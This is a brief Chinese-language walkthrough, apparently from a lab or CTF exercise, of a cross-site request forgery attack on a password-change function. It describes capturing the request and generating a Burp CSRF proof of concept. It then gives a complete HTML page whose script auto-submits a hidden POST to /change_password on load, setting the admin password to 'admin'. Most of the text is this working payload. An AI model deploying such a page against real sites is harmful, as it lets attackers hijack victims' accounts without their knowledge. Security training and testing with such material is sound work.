可以使用user账户进行登录
然后修改下密码抓包
使用Burp生成POC
直接使用burp的CSRF POC生成功能
这里需要注意要把action改为相对地址
提交
然后就可以修改admin的账户密码
直接使用js修改密码
也可以直接传递下的html代码,来对admin的账户进行修改
javascript
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<script>
// 页面加载后自动提交POST请求
window.onload = function() {
// 目标URL
const url = '/change_password';
// 创建并提交表单
const form = document.createElement('form');
form.method = 'POST';
form.action = url;
form.style.display = 'none';
// 添加密码字段
const input = document.createElement('input');
input.type = 'hidden';
input.name = 'new_password';
input.value = 'admin';
form.appendChild(input);
document.body.appendChild(form);
form.submit();
};
</script>
</body>
</html>